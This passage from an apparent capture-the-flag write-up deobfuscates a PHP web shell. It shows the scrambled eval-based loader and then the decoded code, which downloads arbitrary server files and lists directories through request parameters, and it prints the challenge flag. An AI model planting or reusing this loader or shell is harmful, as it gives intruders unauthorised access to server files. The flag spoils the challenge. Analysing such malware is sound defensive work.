w=0w;eex ,.xdE&#39; _i iamV</span><span class="se">\&#34;</span><span class="s2">/a</span><span class="se">\&#34;</span><span class="s2">D &gt;c_ all nd{? tr &lt;l</span><span class="se">\$</span><span class="s2">&gt;&#39;).</span><span class="se">\n</span><span class="s2">&gt; weaea ef </span><span class="se">\n</span><span class="s2">sir .no &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;m{ ; r 0&#39;</span><span class="se">\n</span><span class="s2">&#39;</span><span class="se">\&#34;</span><span class="s2">2 =e[T](</span><span class="se">\$</span><span class="s2">=Armru&gt;E;&gt;d;i &lt;tf mso(d&#39;</span><span class="se">\n</span><span class="s2">&gt; he(aud</span><span class="se">\\\&#34;</span><span class="s2"> &#39; </span><span class="se">\&#34;</span><span class="s2"> nxnam ai &lt;tpysmtd</span><span class="se">\$</span><span class="s2"> o &#39;</span><span class="se">\n</span><span class="s2"> i(0 ]]0 </span><span class="se">\$</span><span class="s2">sc&#39;[;if _ e.t</span><span class="se">\&#34;</span><span class="s2">R</span><span class="se">\n</span><span class="s2"> &#39;</span><span class="se">\n</span><span class="s2">r boi eeai ] </span><span class="se">\n</span><span class="s2"> &gt;ai ein../ ; lisme &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;dl lrt.riPet d</span><span class="se">\$</span><span class="s2"> r </span><span class="se">\$</span><span class="s2">t</span><span class="se">\$</span><span class="s2">0: = 0 opuw&#39;</span><span class="se">\n</span><span class="s2">si&#39;D.t</span><span class="se">\&#34;</span><span class="s2">o;[e</span><span class="se">\&#34;</span><span class="s2">&gt;ee rl &#39; dse, </span><span class="se">\n</span><span class="s2"> Pcsh)r</span><span class="se">\&#34;</span><span class="s2"> &#39; </span><span class="se">\n</span><span class="s2"> osf&#39;= ee ia mcne y et &#39; gem4 == wrtrd}_l.a h f</span><span class="se">\n</span><span class="s2">&#39;c;</span><span class="se">\\</span><span class="s2">cc sye ]{isx &lt;&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34; eh_r .;</span><span class="se">\$\&#34;</span><span class="s2">. </span><span class="se">\n</span><span class="s2"> ate)</span><span class="se">\&#34;</span><span class="s2"> rs npsi=.r&amp;p y r</span><span class="se">\&#34;</span><span class="s2">o)&#39; &#39; ) nieii</span><span class="se">\n</span><span class="s2">fe/Y</span><span class="se">\&#34;</span><span class="s2">o/oePh</span><span class="se">\n</span><span class="s2">nht t.( .</span><span class="se">\n</span><span class="s2">nee</span><span class="se">\$</span><span class="s2"> t r de.&#39;</span><span class="se">\n</span><span class="s2">_&#39;</span><span class="se">\$</span><span class="s2"> </span><span class="se">\n</span><span class="s2"> dsr;&#39; (i k/rn</span><span class="se">\&#34;</span><span class="s2">jm e &amp;p : o]d - x( en&#39;tr</span><span class="se">\$</span><span class="s2">i &#39;}&lt;d&gt;ccHoe&lt;o&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;o y</span><span class="se">\&#34;\$</span><span class="s2"> &#39; gtcc a&lt;m(if / S&gt;v ? &#39;(&#39;</span><span class="se">\n</span><span class="s2">. &#39;z 3c.hss0=e e u e?&#39; &#39;</span><span class="se">\$\$</span><span class="s2"> rt]e&#39;fl=;</span><span class="se">\n</span><span class="s2">/=</span><span class="se">\&#34;</span><span class="s2">uhP cb ril._ (um bti</span><span class="se">\$</span><span class="s2">r=</span><span class="se">\&#34;</span><span class="s2">&#39; E</span><span class="se">\&#34;</span><span class="s2">a &gt; ]</span><span class="se">\$</span><span class="s2">) b Pe r.=jt</span><span class="se">\&#34;</span><span class="s2">(x&#39;l0=e&#39; p= ; )gw</span><span class="se">\$</span><span class="s2">[f)&#39;]ie </span><span class="se">\n\$</span><span class="s2">h&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;&#39;;so_</span><span class="se">\&#34;</span><span class="s2">hr</span><span class="se">\&#34;</span><span class="s2">yfe&lt;F u f</span><span class="se">\$</span><span class="s2">td lrsd(&#39;/. R.l </span><span class="se">\n</span><span class="s2"> )f; a r(}e3</span><span class="se">\&#34;</span><span class="s2">st&gt;</span><span class="se">\$</span><span class="s2">1csx&#39;l- [ &amp;&#39;</span><span class="se">\n</span><span class="s2"> ros&#39;(;];l(</span><span class="se">\$</span><span class="s2">}d2G</span><span class="se">\n</span><span class="s2">&gt; S&lt;o&gt;&lt; =/I p i_ir e&gt;sir</span><span class="se">\&#34;</span><span class="s2">&#39;</span><span class="se">\$</span><span class="s2"> V u}</span><span class="se">\n</span><span class="s2"> )i</span><span class="se">\n</span><span class="s2"> s a</span><span class="se">\$\n</span><span class="s2">l.h</span><span class="se">\&#34;</span><span class="s2">p&lt;f0&#39;e8l&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;s&#39; </span><span class="se">\&#34;</span><span class="s2">( r i?or=r</span><span class="se">\&#34;\n</span><span class="s2">,</span><span class="se">\n</span><span class="s2">e</span><span class="se">\$</span><span class="s2">d</span><span class="se">\n</span><span class="s2">i&gt;Ee</span><span class="se">\\\&#34;</span><span class="s2">Ei &lt;/=(&#39;bL l lGoe </span><span class="se">\n</span><span class="s2">ire.&gt;v E</span><span class="se">\$</span><span class="s2">e</span><span class="se">\n\n</span><span class="s2"> l ehgf}=6t&gt;:/i0; 0&#39;e;</span><span class="se">\$</span><span class="s2">r</span><span class="se">\$</span><span class="s2">0&#39; f ulse% i di</span><span class="se">\$</span><span class="s2">r</span><span class="se">\&#34;</span><span class="s2">Tcn</span><span class="se">\\</span><span class="s2">Ln</span><span class="se">\&#34;</span><span class="s2">id fc&gt;E o eEns c osa </span><span class="se">\&#34;</span><span class="s2">a Rv) </span><span class="se">\n</span><span class="s2"> {e&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34; nemi</span><span class="se">\n\&#34;</span><span class="s2">/t&lt;/sl0 i0; </span><span class="se">\n</span><span class="s2">oem0 (&#39;pdpa1 </span><span class="se">\$</span><span class="s2">f=irds;&#39;h&lt;nFp&lt;ni</span><span class="se">\$</span><span class="s2">io&lt;S a T:u l n l</span><span class="se">\$</span><span class="s2">.l [a) &lt; </span><span class="se">\n</span><span class="s2">) aaal</span><span class="se">\n</span><span class="s2">scp//ce }f0 </span><span class="se">\$</span><span class="s2"> wao0: s[[rds w r;i </span><span class="se">\n</span><span class="s2">&gt;o&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;i&lt;&#39;uipvdll/[ d &#39;[ l a sap_ u &#39;l[ / ) md:e?tsssmr))</span><span class="se">\n</span><span class="s2">( }t ndd1 </span><span class="se">\$</span><span class="s2">&#39;&#39;</span><span class="se">\&#34;</span><span class="s2">i&#39;% o(&#39;)</span><span class="se">\n</span><span class="s2">r=e</span><span class="se">\&#34;</span><span class="s2"> nb]tnu&gt;ieob&#39; e .&#39;&lt;t s &lt;saS</span><span class="se">\$</span><span class="s2">e}Pu&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;n d ee )&gt;ys:cai )</span><span class="se">\n</span><span class="s2">y e</span><span class="se">\&#34;</span><span class="s2">e0&#39; m een]1 ri&#39;) c;</span><span class="se">\&#34;</span><span class="s2">pr. pt</span><span class="se">\&#34;</span><span class="s2">r_rrfed </span><span class="se">\$</span><span class="s2">c/) s / tEv)</span><span class="se">\n</span><span class="s2">Hea i { (rp)</span><span class="se">\n</span><span class="s2">l//rxp{{ </span><span class="se">\$</span><span class="s2"> p r] )- o:xxt,s ls; =sh</span><span class="se">\n</span><span class="s2">&lt;u&gt;</span><span class="se">\&#34;</span><span class="s2">tu&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34; ;.e:&gt;ic umb; = t</span><span class="se">\$</span><span class="s2">hRa) P m v </span><span class="se">\n</span><span class="s2"> </span><span class="se">\$</span><span class="s2">(u;</span><span class="se">\n</span><span class="s2">eb/ict</span><span class="se">\n</span><span class="s2"> m{ e [ &amp; &#39; d eef % ds</span><span class="se">\n</span><span class="s2">{ coeit</span><span class="se">\\</span><span class="s2">&#39;ytt</span><span class="se">\n</span><span class="s2">&#39;xr&lt;lhs pd&gt;</span><span class="se">\n</span><span class="s2"> </span><span class="se">\&#34;</span><span class="s2"> hk(Vl[ _.e &gt; f&#39;b</span><span class="se">\n</span><span class="s2">&lt;soapd&gt; </span><span class="se">\$</span><span class="s2"> o = </span><span class="se">\&#34;</span><span class="s2">=&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34; ?;</span><span class="se">\$</span><span class="s2">e&#39;cc(</span><span class="se">\$</span><span class="s2">1 [ei</span><span class="se">\n</span><span class="s2"> ra cn n p y</span><span class="se">\n</span><span class="s2">/ie/eou l&#39;&lt; et &gt;e</span><span class="se">\$</span><span class="s2">Eun S ] </span><span class="se">\n</span><span class="s2"> iCl hhojtn</span><span class="se">\n</span><span class="s2"> t d</span><span class="se">\$</span><span class="s2"> &#39; e 0 </span><span class="se">\n</span><span class="s2">w Suu</span><span class="se">\&#34;</span><span class="s2">os</span><span class="se">\$</span><span class="s2">&#39;tf en</span><span class="se">\&#34;</span><span class="s2">hpt&lt;metpi&#39;sdbT c o]b ca&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;&lt;</span><span class="se">\n</span><span class="s2">ydRea E</span><span class="se">\&#34;</span><span class="s2"> e&lt; hlai teta&gt;.</span><span class="se">\n</span><span class="s2"> y et u x(0&#39; o&amp;&#39;tt%w</span><span class="se">\&#34;</span><span class="s2">se( ad</span><span class="se">\\</span><span class="s2">ouyde=yef.t&#39;ro&#39;c a)r hbt i[ m L&lt;.c/ eecc mesx</span><span class="se">\n</span><span class="s2">b&lt; p y &#39;</span><span class="se">\$</span><span class="s2">e</span><span class="se">\$</span><span class="s2">0x r ;ee1n,.x</span><span class="se">\$</span><span class="s2">( lin tpit&#39;p&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;= bs&gt;&gt;U&lt;e d)&gt; olh =r&#39;.e F/</span><span class="se">\&#34;</span><span class="s2">hh </span><span class="se">\$</span><span class="s2"> a)h&#39; ltt.</span><span class="se">\n</span><span class="s2">od e &amp;p ;ocm2&#39; l0</span><span class="se">\n</span><span class="s2">&#39;</span><span class="se">\&#34;</span><span class="s2">se =e_</span><span class="se">\$</span><span class="s2"> pr&lt;</span><span class="se">\&#34;</span><span class="s2"> evhhe&#39;(a(E</span><span class="se">\&#34;</span><span class="s2">pbseD </span><span class="se">\&#34;</span><span class="s2"> e&gt; &gt;.P ] &#39;a&lt;ot f hd.e) &gt;</span><span class="se">\&#34;</span><span class="s2">r&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;g&lt;oi =e e </span><span class="se">\n</span><span class="s2">wuo0 dx ]]</span><span class="se">\&#34;</span><span class="s2">r</span><span class="se">\$</span><span class="s2">scPd a(b&lt;t= oi=sis</span><span class="se">\$</span><span class="s2">r;lrsci{; </span><span class="se">\&#34;</span><span class="s2"> N &#39;H</span><span class="se">\&#34;</span><span class="s2"> ]&gt;/ m i ee&#39;-; </span><span class="se">\n</span><span class="s2"> ao!tv &#39;l0=e ntd): [8 = ,[gpuOi t</span><span class="se">\$</span><span class="s2">riy&#39;cdd&#39;useur</span><span class="se">\n</span><span class="s2">o&gt;fhr</span><span class="se">\n\n</span><span class="s2"> </span><span class="se">\$</span><span class="s2">ta </span><span class="se">\$</span><span class="s2">/P&lt;.e &lt;t</span><span class="se">\&#34;</span><span class="s2">&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;l l ar</span><span class="se">\&#34;</span><span class="s2">C</span><span class="se">\n</span><span class="s2"> &lt;hpo-s psx&#39;l eee </span><span class="se">\&#34;</span><span class="s2">0 == &#39;rrtSr hd&gt;npsl=dfbsnpo a&lt;uoe vam v&#39;_/ l./d&lt;&gt; e d(&#39;o !r.g-tc</span><span class="se">\$</span><span class="s2">&#39;e6-s r</span><span class="se">\&#34;</span><span class="s2"> ?&#39; e0 &#39; </span><span class="se">\$</span><span class="s2">woieT (i&lt;peua&#39;eime&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;alr dbl c fabe&lt;a.Sa</span><span class="se">\&#34;</span><span class="s2">s t&gt;/ e&#39;)n -eml rlm; 0&#39;e []&amp; - x x(trun&#39;[= </span><span class="se">\$</span><span class="s2">rfu=bsPnlitmo. &#39;rl&#39;t oll&lt;/l</span><span class="se">\$</span><span class="s2">E&gt;&lt;e</span><span class="se">\&#34;</span><span class="s2">d&lt;t = rC;t -fieLaao i0; </span><span class="se">\&#34;</span><span class="s2"> &#39;&#39;</span><span class="se">\$</span><span class="s2">e) &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;&#39;</span><span class="se">\$</span><span class="s2">yipt]&#39;= d)ot&#39;msO&#39;et(ea ]&gt;y&lt;o rue/tuvL&lt;/ ?&gt;tr (o</span><span class="se">\n</span><span class="s2">r =naapsd}f0 i w=0w;wc )wpt[f)d i;r ti=S &#39;&#39;</span><span class="se">\$</span><span class="s2">(dF [&lt; br ee-treaF/t{d&lt;d&gt; </span><span class="se">\$</span><span class="s2">h&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;&#39;n o L</span><span class="se">\&#34;</span><span class="s2">.ptcse</span><span class="se">\n</span><span class="s2">( }f r 0&#39;</span><span class="se">\n</span><span class="s2">ou</span><span class="se">\$</span><span class="s2"> oee&#39;(;iN r</span><span class="se">\n</span><span class="s2">mtet&#39;Tn _</span><span class="se">\$</span><span class="s2">Di &#39;biry a hh&gt;)l&#39;td</span><span class="se">\n</span><span class="s2">ot&gt;</span><span class="se">\&#34;</span><span class="s2"> _eCt l rahcied= )</span><span class="se">\n</span><span class="s2">( i(0 rtoi?r)&#39;r</span><span class="se">\&#34;\n</span><span class="s2">rU e.e yx&#39;n&#39;anvP_il t&gt;n&gt;. c&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;</span><span class="se">\\</span><span class="s2">o&gt;</span><span class="se">\n</span><span class="s2"> u]d&gt; wd ; Gaoe : ettsssn</span><span class="se">\&#34;</span><span class="s2">= </span><span class="se">\$</span><span class="s2"> </span><span class="se">\$</span><span class="s2">t</span><span class="se">\$</span><span class="s2">4: lewf l;]e% &#39;L c&#39;capt a maaOFre mF &lt;&#39; hnv</span><span class="se">\n</span><span class="s2"> {e &gt;&lt; n&gt;</span><span class="se">\&#34;\n</span><span class="s2"> Ednn aets.t.c m{ </span><span class="se">\$</span><span class="s2">oem0 d</span><span class="se">\&#34;</span><span class="s2">n(&#39;d</span><span class="se">\n</span><span class="s2">,a1 ]L h/hce&#39;vveemlS&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;Ie }pi&#39;b&lt;ee &lt;e </span><span class="se">\n</span><span class="s2">).&lt;t l</span><span class="se">\&#34;</span><span class="s2"> } Tett m dsp</span><span class="se">\&#34;</span><span class="s2">c cof o mw</span><span class="se">\&#34;</span><span class="s2">o)&#39; []e s[ ds ) o&#39;ot= abn=euTLca</span><span class="se">\n</span><span class="s2">_l.r/cx(br ) td o..</span><span class="se">\n</span><span class="s2"> [re- u ft:&gt;oconi d</span><span class="se">\$</span><span class="s2"> on]d - &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;</span><span class="se">\&#34;</span><span class="s2"> r</span><span class="se">\$</span><span class="s2">&#39;&#39; </span><span class="se">\$</span><span class="s2">&#39;% )oe . i&#39;nlac&#39;=e[Etl ne</span><span class="se">\$</span><span class="s2">&gt;bhe</span><span class="se">\$</span><span class="s2">r )</span><span class="se">\&#34;</span><span class="s2">d&gt; a e &#39;(nD s i /</span><span class="se">\n</span><span class="s2">momtl et de e?&#39; w=[m e o]1 rc</span><span class="se">\$\$\&#34;</span><span class="s2">ohaurtd&#39;=&#39;Sor a d&lt;&gt;occ&gt;t &lt; ?&gt; dppc d&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;&#39;ti t lc/</span><span class="se">\n</span><span class="s2">/m/ae y er= ; r </span><span class="se">\&#34;</span><span class="s2">o:x w,s { hfv&lt;nime-yif&#39;s[re m&#39;ib&lt; (m</span><span class="se">\&#34;</span><span class="s2">a / {d</span><span class="se">\&#34;\&#34;</span><span class="s2"> =orh oC-s -heom&lt;apbip &amp;p [ &amp;&#39;</span><span class="se">\n</span><span class="s2"> i(ed e n % </span><span class="se">\n</span><span class="s2">!oiah=de=fpriUu&#39;ya e.r b</span><span class="se">\&#34;</span><span class="s2">&#39;d;b t&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34; </span><span class="se">\n</span><span class="s2">i. </span><span class="se">\&#34;</span><span class="s2">sio woTp re(ma!jionee e &amp;</span><span class="se">\&#34;</span><span class="s2">( r </span><span class="se">\$</span><span class="s2">t</span><span class="se">\$</span><span class="s2">xe&#39;c e</span><span class="se">\$</span><span class="s2">1 i ll2&#39;d=&#39;oe&#39;lpbf)d &#39;</span><span class="se">\$</span><span class="s2">.sr&lt;cr</span><span class="se">\n</span><span class="s2">l h r . .in &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="k">for</span><span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o">&lt;</span> <span class="nv">$pPziZoJiMpcu</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="nv">$liGBOKxsOGMz</span><span class="p">[]</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="k">for</span><span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o">&lt;</span> <span class="p">(</span><span class="nx">strlen</span><span class="p">(</span><span class="nv">$iyzQ5h8qf6</span><span class="p">)</span> <span class="o">/</span> <span class="nv">$pPziZoJiMpcu</span><span class="p">);</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="k">for</span><span class="p">(</span><span class="nv">$r</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$r</span> <span class="o">&lt;</span> <span class="nv">$pPziZoJiMpcu</span><span class="p">;</span> <span class="nv">$r</span><span class="o">++</span><span class="p">)</span> <span class="nv">$liGBOKxsOGMz</span><span class="p">[</span><span class="nv">$r</span><span class="p">]</span> <span class="o">.=</span> <span class="nv">$iyzQ5h8qf6</span><span class="p">[</span><span class="nv">$r</span> <span class="o">+</span> <span class="nv">$i</span> <span class="o">*</span> <span class="nv">$pPziZoJiMpcu</span><span class="p">];</span> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="nv">$bhrTeZXazQ</span> <span class="o">=</span> <span class="nx">trim</span><span class="p">(</span><span class="nx">implode</span><span class="p">(</span><span class="s2">&#34;&#34;</span><span class="p">,</span> <span class="nv">$liGBOKxsOGMz</span><span class="p">));</span> </span></span><span class="line"><span class="cl"><span class="nv">$bhrTeZXazQ</span> <span class="o">=</span> <span class="s2">&#34;?&gt;</span><span class="si">$bhrTeZXazQ</span><span class="s2">&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="k">eval</span><span class="p">(</span> <span class="nv">$bhrTeZXazQ</span> <span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="cp">?&gt;</span><span class="err"> </span></span></span></code></pre></div><p>That doesn&rsquo;t look nice, let&rsquo;s replace <code>eval</code> by <code>echo</code> and execute this to see decoded codes:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="cp">?&gt;</span><span class="err">&lt;?php </span></span></span><span class="line"><span class="cl"><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err">if (isset($_GET[&#39;download&#39;])) { </span></span></span><span class="line"><span class="cl"><span class="err"> $file = $_GET[&#39;download&#39;]; </span></span></span><span class="line"><span class="cl"><span class="err"> if (file_exists($file)) { </span></span></span><span class="line"><span class="cl"><span class="err"> header(&#39;Content-Description: File Transfer&#39;); </span></span></span><span class="line"><span class="cl"><span class="err"> header(&#39;Content-Type: application/octet-stream&#39;); </span></span></span><span class="line"><span class="cl"><span class="err"> header(&#39;Content-Disposition: attachment; filename=&#34;&#39;.basename($file).&#39;&#34;&#39;); </span></span></span><span class="line"><span class="cl"><span class="err"> header(&#39;Expires: 0&#39;); </span></span></span><span class="line"><span class="cl"><span class="err"> header(&#39;Cache-Control: must-revalidate&#39;); </span></span></span><span class="line"><span class="cl"><span class="err"> header(&#39;Pragma: public&#39;); </span></span></span><span class="line"><span class="cl"><span class="err"> header(&#39;Content-Length: &#39; . filesize($file)); </span></span></span><span class="line"><span class="cl"><span class="err"> readfile($file); </span></span></span><span class="line"><span class="cl"><span class="err"> exit; </span></span></span><span class="line"><span class="cl"><span class="err"> } </span></span></span><span class="line"><span class="cl"><span class="err">} </span></span></span><span class="line"><span class="cl"><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err">?&gt; </span></span></span><span class="line"><span class="cl"><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err">&lt;html&gt; </span></span></span><span class="line"><span class="cl"><span class="err">&lt;!-- Latest compiled and minified CSS --&gt; </span></span></span><span class="line"><span class="cl"><span class="err">&lt;link rel=&#34;stylesheet&#34; href=&#34;http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css&#34;&gt; </span></span></span><span class="line"><span class="cl"><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err">&lt;!-- jQuery library --&gt; </span></span></span><span class="line"><span class="cl"><span class="err">&lt;script src=&#34;https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js&#34;&gt;&lt;/script&gt; </span></span></span><span class="line"><span class="cl"><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err">&lt;!-- Latest compiled JavaScript --&gt; </span></span></span><span class="line"><span class="cl"><span class="err">&lt;script src=&#34;http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js&#34;&gt;&lt;/script&gt; </span></span></span><span class="line"><span class="cl"><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err">&lt;div class=&#34;container&#34;&gt; </span></span></span><span class="line"><span class="cl"><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err">&lt;?php </span></span></span><span class="line"><span class="cl"><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err">function printPerms($file) { </span></span></span><span class="line"><span class="cl"><span class="err"> $mode = fileperms($file); </span></span></span><span class="line"><span class="cl"><span class="err"> if( $mode &amp; 0x1000 ) { $type=&#39;p&#39;; } </span></span></span><span class="line"><span class="cl"><span class="err"> else if( $mode &amp; 0x2000 ) { $type=&#39;c&#39;; } </span></span></span><span class="line"><span class="cl"><span class="err"> else if( $mode &amp; 0x4000 ) { $type=&#39;d&#39;; } </span></span></span><span class="line"><span class="cl"><span class="err"> else if( $mode &amp; 0x6000 ) { $type=&#39;b&#39;; } </span></span></span><span class="line"><span class="cl"><span class="err"> else if( $mode &amp; 0x8000 ) { $type=&#39;-&#39;; } </span></span></span><span class="line"><span class="cl"><span class="err"> else if( $mode &amp; 0xA000 ) { $type=&#39;l&#39;; } </span></span></span><span class="line"><span class="cl"><span class="err"> else if( $mode &amp; 0xC000 ) { $type=&#39;s&#39;; } </span></span></span><span class="line"><span class="cl"><span class="err"> else $type=&#39;u&#39;; </span></span></span><span class="line"><span class="cl"><span class="err"> $owner[&#34;read&#34;] = ($mode &amp; 00400) ? &#39;r&#39; : &#39;-&#39;; </span></span></span><span class="line"><span class="cl"><span class="err"> $owner[&#34;write&#34;] = ($mode &amp; 00200) ? &#39;w&#39; : &#39;-&#39;; </span></span></span><span class="line"><span class="cl"><span class="err"> $owner[&#34;execute&#34;] = ($mode &amp; 00100) ? &#39;x&#39; : &#39;-&#39;; </span></span></span><span class="line"><span class="cl"><span class="err"> $group[&#34;read&#34;] = ($mode &amp; 00040) ? &#39;r&#39; : &#39;-&#39;; </span></span></span><span class="line"><span class="cl"><span class="err"> $group[&#34;write&#34;] = ($mode &amp; 00020) ? &#39;w&#39; : &#39;-&#39;; </span></span></span><span class="line"><span class="cl"><span class="err"> $group[&#34;execute&#34;] = ($mode &amp; 00010) ? &#39;x&#39; : &#39;-&#39;; </span></span></span><span class="line"><span class="cl"><span class="err"> $world[&#34;read&#34;] = ($mode &amp; 00004) ? &#39;r&#39; : &#39;-&#39;; </span></span></span><span class="line"><span class="cl"><span class="err"> $world[&#34;write&#34;] = ($mode &amp; 00002) ? &#39;w&#39; : &#39;-&#39;; </span></span></span><span class="line"><span class="cl"><span class="err"> $world[&#34;execute&#34;] = ($mode &amp; 00001) ? &#39;x&#39; : &#39;-&#39;; </span></span></span><span class="line"><span class="cl"><span class="err"> if( $mode &amp; 0x800 ) $owner[&#34;execute&#34;] = ($owner[&#39;execute&#39;]==&#39;x&#39;) ? &#39;s&#39; : &#39;S&#39;; </span></span></span><span class="line"><span class="cl"><span class="err"> if( $mode &amp; 0x400 ) $group[&#34;execute&#34;] = ($group[&#39;execute&#39;]==&#39;x&#39;) ? &#39;s&#39; : &#39;S&#39;; </span></span></span><span class="line"><span class="cl"><span class="err"> if( $mode &amp; 0x200 ) $world[&#34;execute&#34;] = ($world[&#39;execute&#39;]==&#39;x&#39;) ? &#39;t&#39; : &#39;T&#39;; </span></span></span><span class="line"><span class="cl"><span class="err"> $s=sprintf(&#34;%1s&#34;, $type); </span></span></span><span class="line"><span class="cl"><span class="err"> $s.=sprintf(&#34;%1s%1s%1s&#34;, $owner[&#39;read&#39;], $owner[&#39;write&#39;], $owner[&#39;execute&#39;]); </span></span></span><span class="line"><span class="cl"><span class="err"> $s.=sprintf(&#34;%1s%1s%1s&#34;, $group[&#39;read&#39;], $group[&#39;write&#39;], $group[&#39;execute&#39;]); </span></span></span><span class="line"><span class="cl"><span class="err"> $s.=sprintf(&#34;%1s%1s%1s&#34;, $world[&#39;read&#39;], $world[&#39;write&#39;], $world[&#39;execute&#39;]); </span></span></span><span class="line"><span class="cl"><span class="err"> return $s; </span></span></span><span class="line"><span class="cl"><span class="err">} </span></span></span><span class="line"><span class="cl"><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err"> </span></span></span><span class="line"><span class="cl"><span class="err">$dir = $_GET[&#39;dir&#39;]; </span></span></span><span class="line"><span class="cl"><span class="err">if (isset($_POST[&#39;dir&#39;])) { </span></span></span><span class="line"><span class="cl"><span class="err"> $dir = $_POST[&#39;dir&#39;]; </span></span></span><span class="line"><span class="cl"><span class="err">} </span></span></span><span class="line"><span class="cl"><span class="err">$file = &#39;&#39;; </span></span></span><span class="line"><span class="cl"><span class="err">if ($dir == NULL or !is_dir($dir)) { </span></span></span><span class="line"><span class="cl"><span class="err"> if (is_file($dir)) { </span></span></span><span class="line"><span class="cl"><span class="err"> echo &#34;enters&#34;; </span></span></span><span class="line"><span class="cl"><span class="err"> $file = $dir; </span></span></span><span class="line"><span class="cl"><span class="err"> echo $file; </span></span></span><span class="line"><span class="cl"><span class="err"> } </span></span></span><span class="line"><span class="cl"><span class="err"> $dir = &#39;./&#39;; </span></span></span><span class="line"><span class="cl"><span class="err">} </span></span></span><span class="line"><span class="cl"><span class="err">$dir = realpath($dir.&#39;/&#39;.$value); </span></span></span><span class="line"><span class="cl"><span class="err">##flag = HTB{W0w_ROt_A_DaY} </span></span></span><span class="line"><span class="cl"><span class="err">$dirs = scandir($dir); </span></span></span><span class="line"><span class="cl"><span class="err">echo &#34;&lt;h2&gt;Viewing directory &#34; . $dir . &#34;&lt;/h2&gt;&#34;; </span></span></span><span class="line"><span class="cl"><span class="err">echo &#34;\n&lt;br&gt;&lt;form action=&#39;&#34;.$_SERVER[&#39;PHP_SELF&#39;].&#34;&#39; method=&#39;GET&#39;&gt;&#34;; </span></span></span><span 